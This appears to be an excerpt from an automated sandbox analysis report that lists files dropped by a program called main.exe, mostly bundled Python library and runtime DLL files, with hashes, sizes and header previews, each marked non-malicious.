                                                                                                                                                                                                                                                                              SHA1:6300AA77A908333E3B1FF3EAB7D21CAAD23A2816
                                                                                                                                                                                                                                                                              SHA-256:9E1A1A6E3BA9046E358FF2713C2277CA582B67A171F2830215B88B17D29A7EA7
                                                                                                                                                                                                                                                                              SHA-512:5F82B171ECDE9CB7D0272B324B4364F9B7D5A36980D1C7F7927E5DEE8E3609C856EF4EB5A1570BDB81468A690FDEE4C7B53AD0DFA0872B1503C61E3CB5CA6011
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1..Name: MarkupSafe..Version: 3.0.2..Summary: Safely add untrusted strings to HTML/XML markup...Maintainer-email: Pallets <contact@palletsprojects.com>..License: Copyright 2010 Pallets.. .. Redistribution and use in source and binary forms, with or without.. modification, are permitted provided that the following conditions are.. met:.. .. 1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer... .. 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution... .. 3. Neither the name of the copyright holder nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\RECORD

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1095
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8868247049574105
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:p30n/2zDe0vCWPG0YJK/n0gw0IB0lWwk7q7Gq5DtC4ntjYR2oHlFw9gVStvWJV:J0nuXe0aWPG0+qn0gw0K0lQQRq4t0R2i
                                                                                                                                                                                                                                                                              MD5:3CB854C46E9DECE3E932DE4FCF4A2780
                                                                                                                                                                                                                                                                              SHA1:C7E7962F9BA09AEC237A2F9A4C214DCAC25B2142
                                                                                                                                                                                                                                                                              SHA-256:430B80979C73C53C64201BB5A0FC5C63845ABFDFBA29EA03CEB836B6ED77992D
                                                                                                                                                                                                                                                                              SHA-512:393C112444D075476A05B60A698210F70D0E336633B4365CA85C01AEAB6B89488832F12F3C3BA1D18C8E5845C1D4D480C81E58FDFF0DB459A6B3BDBDBE313C02
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MarkupSafe-3.0.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..MarkupSafe-3.0.2.dist-info/LICENSE.txt,sha256=RjHsDbX9kKVH4zaBcmTGeYIUM4FG-KyUtKV_lu6MnsQ,1503..MarkupSafe-3.0.2.dist-info/METADATA,sha256=nhoabjupBG41j_JxPCJ3ylgrZ6Fx8oMCFbiLF9Kafqc,4067..MarkupSafe-3.0.2.dist-info/RECORD,,..MarkupSafe-3.0.2.dist-info/WHEEL,sha256=tE2EWZPEv-G0fjAlUUz7IGM64246YKD9fpv4HcsDMkk,101..MarkupSafe-3.0.2.dist-info/top_level.txt,sha256=qy0Plje5IJuvsCBjejJyhDCjEAdcDLK_2agVcex8Z6U,11..markupsafe/__init__.py,sha256=pREerPwvinB62tNCMOwqxBS2YHV6R52Wcq1d-rB4Z5o,13609..markupsafe/__pycache__/__init__.cpython-311.pyc,,..markupsafe/__pycache__/_native.cpython-311.pyc,,..markupsafe/_native.py,sha256=2ptkJ40yCcp9kq3L1NqpgjfpZB-obniYKFFKUOkHh4Q,218..markupsafe/_speedups.c,sha256=SglUjn40ti9YgQAO--OgkSyv9tXq9vvaHyVhQows4Ok,4353..markupsafe/_speedups.cp311-win_amd64.pyd,sha256=-5qfBr0xMpiTRlH9hFg_7Go9PHi7z5guMzmbbmZI3Xw,13312..markupsafe/_speedups.pyi,sha256=LSDmXYOefH4HVpAXuL8sl7AttLw

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\WHEEL

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):101
                                                                                                                                                                                                                                                                              Entropy (8bit):5.028731013591746
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAQ3VMSgP+tkKcfxLQLn:RtC12VAWK5NQLn
                                                                                                                                                                                                                                                                              MD5:C45C8E16945267D2E57AB615D7DE704D
                                                                                                                                                                                                                                                                              SHA1:017434CC3950C6E4CDD18C90974AC4002F062D26
                                                                                                                                                                                                                                                                              SHA-256:B44D845993C4BFE1B47E3025514CFB20633AE36E3A60A0FD7E9BF81DCB033249
                                                                                                                                                                                                                                                                              SHA-512:3609FCBB3C9E28003DCA1BCF32EC082146954A75D673AF3B8E27449D9504A4CA197EE1C64F812DF6E6D95BDDAB5160B5EB6C3D61B0FD870701E23FD78B88D600
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (75.2.0).Root-Is-Purelib: false.Tag: cp311-cp311-win_amd64..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\top_level.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:5Pgn:1g
                                                                                                                                                                                                                                                                              MD5:5862354C9FBB5B15204672C79808E25C
                                                                                                                                                                                                                                                                              SHA1:F53E3E1C5D96F0C96145FD9477EA8DBD30ACEB7B
                                                                                                                                                                                                                                                                              SHA-256:AB2D0F9637B9209BAFB020637A32728430A310075C0CB2BFD9A81571EC7C67A5
                                                                                                                                                                                                                                                                              SHA-512:08123B4AC8551787F74F03A452BC0B78D6FFA709C072F9265B4A0D2485CC465CC4667282273415E0841CAAE49565D26CB5AFBF7124E870A26CC89C7CD517FC7A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:markupsafe.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2348032
                                                                                                                                                                                                                                                                              Entropy (8bit):6.507217190946273
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:49152:GH3voy7XzO1XXKU4aCM7iEPs2UkcEFCkXRKhf:S5S5CbEPs2UkcIR
                                                                                                                                                                                                                                                                              MD5:F915AE75CB21D59B5945B90C65DE2E4F
                                                                                                                                                                                                                                                                              SHA1:C52BE4CE7D8730B86C5D15ABE8E239B4A57423F1
                                                                                                                                                                                                                                                                              SHA-256:B0A0BC66A68AC7DFA2343D904563E644DE76D0AC14AFF0CA87804351977B0C43
                                                                                                                                                                                                                                                                              SHA-512:05FAE28E77026DB9A446238300A226F0AF999B172B77CE80EA41B116174D1BA411FC94E233516527F1DCF53830AC39CDD82997CC3D632FCA4C0A9CEAAF352888
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.6.'.XK'.XK'.XK...K7.XK7.YJ%.XK7..K#.XK7.[J#.XK7.\J/.XK7.]J).XKH.YJ%.XKl.YJ .XK'.YK+.XK'.XK<.XKo.\J..XKo.PJm.XKo.XJ&.XKo..K&.XKo.ZJ&.XKRich'.XK........PE..d...C..g.........." ...).D...................................................P$...........`..........................................U".`....V"...... $...... #.<............0$.......!.......................!.(...`.!.@............`..H............................text...(C.......D.................. ..`.rdata..(....`.......H..............@..@.data........."..b...\".............@....pdata..<.... #.......".............@..@.rsrc........ $.......#.............@..@.reloc.......0$.......#.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):264192
                                                                                                                                                                                                                                                                              Entropy (8bit):6.270986211983934
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:EP41y0ekP31Q6SjRI7OghnznLg9uP1+74/LgHmPr9qvZqhLaHLTLrLfqeqwLQH6P:EPv0d1BhnznLg9uP1+74/LgHmPr9qvZ3
                                                                                                                                                                                                                                                                              MD5:61320942BD13D8D5769AC3E6CC391920
                                                                                                                                                                                                                                                                              SHA1:89FB3F6D306846780B8AD134232C90AC9B746DDF
                                                                                                                                                                                                                                                                              SHA-256:72327EFD000B11F16FCFFCA5FA9F33E7C5DF405B1EB1395EC88A8E050879CF4F
                                                                                                                                                                                                                                                                              SHA-512:71D84FD0ACDA95E34669A581AD6D2F588ED18847595F72C023869035F8C1B4478AF9E162DE2B431A8823BAA17EE567CC9B169267EBD891AE61B28D32BB22E6A3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3_.b]..b]..b]......b]...\..b]...^..b]...Y..b]...X..b]...\..b]...\..b]..b\..b]...U..b]...]..b].....b]..._..b].Rich.b].........PE..d...4..g.........." ...).....$...............................................P............`.............................................h...H........0...........0...........@...... a..............................._..@............................................text............................... ..`.rdata..............................@..@.data....>.......:..................@....pdata...0.......2..................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25088
                                                                                                                                                                                                                                                                              Entropy (8bit):5.6720886655900955
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:jBYwU5ktEr4PpuzosXu1UwYS60IDwFOzID8/gLJE5S:jBYpkyrNzoZ1UwYSEcHD1u
                                                                                                                                                                                                                                                                              MD5:EBFFC55095A9B8EE82BFDB2FE78AA7B9
                                                                                                                                                                                                                                                                              SHA1:F2FC8EF8330F47A43D7A91B5FDDC84F3FFB6E77E
                                                                                                                                                                                                                                                                              SHA-256:E9744D6603DB9183944399EDD29C9C3DBC8F4664AB3339E91FC09A46F3F42A72
                                                                                                                                                                                                                                                                              SHA-512:B982CE5B858FEA5F0E7248D9A9E080359AB4855433D50A70E8A6AB3810DB712C229A9E70AF678983C7F2F4AF97B7E0A92C983CB18F57F1489E1E3DBE82165FF5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*m.]n...n...n...gt..j...~...l...%t..l...~...m...~...f...~...b.......m...n...]...&...o...&...o...&.i.o...&...o...Richn...................PE..d...4..g.........." ...).8...,.......;....................................................`..........................................a..h...xa..x...............h...............@....U..............................PT..@............P...............................text....7.......8.................. ..`.rdata..8....P.......<..............@..@.data...P....p.......T..............@....pdata..h............V..............@..@.rsrc................^..............@..@.reloc..@............`..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                                                                                              Entropy (8bit):5.050327721704098
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:dgVCU10jtgMdVSguynyAQiLR/+J+YcfG/K3oo/ckgUv:dG16jdwL6yALA1cUK3ooXgU
                                                                                                                                                                                                                                                                              MD5:7548521BAED25B71A82A1DEB89D1DB49
                                                                                                                                                                                                                                                                              SHA1:332A8AFFA1EACA353585476FD5971281CF0847AB
                                                                                                                                                                                                                                                                              SHA-256:027B2D38C10C981C4E77BFA525BCA36919617DB470D0F21ED9DB05A11A2E5D88
                                                                                                                                                                                                                                                                              SHA-512:EE7770856FE26E4C917326935E26F585406F7003BEE5BC729C7E6694E74EE9580C4A5F6A4915A29C3537DDACF6FE1282AFC7911B1132E51D915AC9A1A0F4D6BC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>..rm..rm..rm..m..rm.Ysl..rm.Yql..rm.Yvl..rm.Ywl..rm.\sl..rm..sl..rm..sm..rm.Xzl..rm.Xrl..rm.X.m..rm.Xpl..rmRich..rm................PE..d...4..g.........." ...).....$............................................................`..........................................<..d...d<.......p.......`..................<....5...............................4..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...X....P.......2..............@....pdata.......`.......4..............@..@.rsrc........p.......8..............@..@.reloc..<............:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):410112
                                                                                                                                                                                                                                                                              Entropy (8bit):6.534151609407411
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:oaR+TV/lPIcJmmV6MBfPN4aoan4f6vSKCKMhNJ/m9g5:oaRqZlPLFZf6anaKGug5
                                                                                                                                                                                                                                                                              MD5:94A8C9A45CEA058A88F262D8BC82890B
                                                                                                                                                                                                                                                                              SHA1:8E915709DBFEA921F15E9BE894EC932D38CE95E2
                                                                                                                                                                                                                                                                              SHA-256:97593899B4A32FA70D407C8BCE1109759611C2DFB69D34C62FBF0724C31796DE
                                                                                                                                                                                                                                                                              SHA-512:4E2CF0FA63451E610BE61D09ADF355BA505EBD90307C184127D34855A324A0A01745AF3CF8B206C159E75F1B7F3C8ADA53428E83540371EE8243E64B2C89816D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2...S.W.S.W.S.W.+.W.S.W..V.S.W.+.V.S.W..V.S.W..V.S.W..V.S.W..V.S.W.S.W.S.W..V.S.W..V.S.W..V.S.W..cW.S.W..V.S.WRich.S.W........PE..d...2..g.........." ...).....Z............................................................`.............................................\...\................P...;..................................................P...@............ ...............................text............................... ..`.rdata....... ......................@..@.data....2..........................@....pdata...;...P...<..................@..@.rsrc................>..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):5653536
                                                                                                                                                                                                                                                                              Entropy (8bit):6.729079283804055
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:49152:ULnsrdZXUTQyJa9qgUUjlQNXkW8GCBTDgHsYogTYn3s3pQMqSj+vTCfEs7ATWYls:UoJUEUYS3zUQFLOAkGkzdnEVomFHKnP+
                                                                                                                                                                                                                                                                              MD5:CD1D99DF975EE5395174DF834E82B256
                                                                                                                                                                                                                                                                              SHA1:F395ADA2EFC6433B34D5FBC5948CB47C7073FA43
                                                                                                                                                                                                                                                                              SHA-256:D8CA1DEA862085F0204680230D29BFF4D168FFF675AB4700EEAF63704D995CB3
                                                                                                                                                                                                                                                                              SHA-512:397F725E79CA2C68799CF68DFB111A1570427F3D2175D740758C387BDAA508BC9014613E997B92FC96E884F66BB17F453F8AA035731AFD022D9A4E7095616F87
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.cu...&...&...&...'...&...'...&...'...&..&...&G..'...&G..'...&...'...&...&..&G..'...&G..'...&G..'...&G..'...&G..&...&G..'...&Rich...&................PE..d...9.:e.........." .....(-..X)......X,.......................................V.....&~V...`A..........................................:.....h.;.......?......`=..8....V. (...PU.0p..P.5.T...........................`...8............@-.P...(.:......................text....&-......(-................. ..`.rdata.......@-......,-.............@..@.data....6... <.......<.............@....pdata...8...`=..:....<.............@..@.didat..H.....?.......?.............@....rsrc.........?.......?.............@..@.reloc..0p...PU..r....T.............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1143296
                                                                                                                                                                                                                                                                              Entropy (8bit):6.0410832425584795
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:dk6co2gGIs7ZetrV6LMEsKK+Onc8fUqzFVVppS6yZAXz:dkG2QQetrgsK79qzFHL
                                                                                                                                                                                                                                                                              MD5:F0116137D0674482247D056642DC06BF
                                                                                                                                                                                                                                                                              SHA1:5BB63FCF5E569D94B61383D1921F758BCC48EF81
                                                                                                                                                                                                                                                                              SHA-256:8ECA3ED313003D3F3DEE1B7A5CE90B50E8477EC6E986E590E5ED91C919FC7564
                                                                                                                                                                                                                                                                              SHA-512:A8D6420C491766302C615E38DAF5D9B1698E5765125FD256530508E5C0A5675A7BF2F338A22368E0B4DDFA507D8D377507376C477CF9B829E28F3C399203CDE6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.K.K...K...K...3]..K..Y>...K.......K...3...K...>...K...>...K...>...K...K...M...>...K..Y>...K..Y>...K..Y>1..K..Y>...K..Rich.K..........................PE..d......g.........." .........r......4.....................................................`.........................................`....T..hr..h...............................l\......T.......................(.......8................0...........................text............................... ..`.rdata..|...........................@..@.data...............................@....pdata...............d..............@..@.rsrc...............................@..@.reloc..l\.......^..................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):49528
                                                                                                                                                                                                                                                                              Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                                                              MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                                                              SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                                                              SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                                                              SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):65304
                                                                                                                                                                                                                                                                              Entropy (8bit):6.190271220500476
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:/0f8MOytWQazE6XWpkJONIYOnsO7SyLzx1z:cf8X2sE6XWpkJONIYOndx
                                                                                                                                                                                                                                                                              MD5:07A6E6DCC30E1C4C7E0CDC41A457A887
                                                                                                                                                                                                                                                                              SHA1:53BC820B63D88CBE889944E242B50662B4B2CB42
                                                                                                                                                                                                                                                                              SHA-256:746BC8FA88282AFE19DC60E426CC0A75BEA3BD137CCA06A0B57A30BD31459403
                                                                                                                                                                                                                                                                              SHA-512:837F1E40DB9BDF1BC73B2A700DF6086A3ACDB7D52AFC903239410B2D226FFD1DD5E8B5F317401BCF58DD042BD56787AF6CDC49AF96FCB588BCF0127D536B6C6D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~...~...~.......~.......~.......~.......~.......~.......~.......~...~..>~.......~.......~....m..~.......~..Rich.~..........................PE..d...\..f.........." ...&.R..........\.....................................................`.........................................@...P.......d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata...J...p...L...V..............@..@.data...X...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):820736
                                                                                                                                                                                                                                                                              Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                                                              MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                                                              SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                                                              SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                                                              SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ls...........u......q......u......q......q......q.....Yq...........Hp.....Hp.....Hp.....Hp.....Rich............................PE..d......d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):84760
                                                                                                                                                                                                                                                                              Entropy (8bit):6.5862319447347115
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:CX8z7RFgpNVu5eYu00NI5OhgYNxx8bhm+uVIYCVH7Symxs:CszlF+uyIkNxebhEVIYCVHL
                                                                                                                                                                                                                                                                              MD5:AA1083BDE6D21CABFC630A18F51B1926
